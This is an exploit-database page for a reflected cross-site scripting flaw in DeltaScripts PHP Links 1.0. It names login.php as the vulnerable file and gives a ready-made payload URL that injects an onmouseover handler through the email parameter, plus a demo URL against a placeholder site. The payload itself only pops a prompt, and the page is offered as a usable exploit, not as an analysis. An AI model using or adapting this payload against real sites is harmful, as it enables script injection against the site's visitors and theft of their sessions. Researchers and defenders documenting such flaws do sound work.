[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DeltaScripts PHP Links XSS Vulnerability

Author
Crux
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11114
Category
web applications
Date add
27-02-2010
Platform
unsorted
========================================
DeltaScripts PHP Links XSS Vulnerability
========================================

[+] Exploit Title: DeltaScripts PHP Links XSS Vulnerability
[+] Date: January 09 2010
[+] Author: Crux [mail:cruxtheking@live.com]
[+] Software Link: http://www.deltascripts.com/phplinks/
[+] Version: 1.0
[+] Tested on: ALL OS
[+] Dork: NO NO NO!

[ Vulnerable File ]

login.php
(The post variable, post_id)


[ EXPLOIT ]

/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1


[ DEMO ]
http://sitename.com/phplinks/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1




#  0day.today [2024-11-16]  #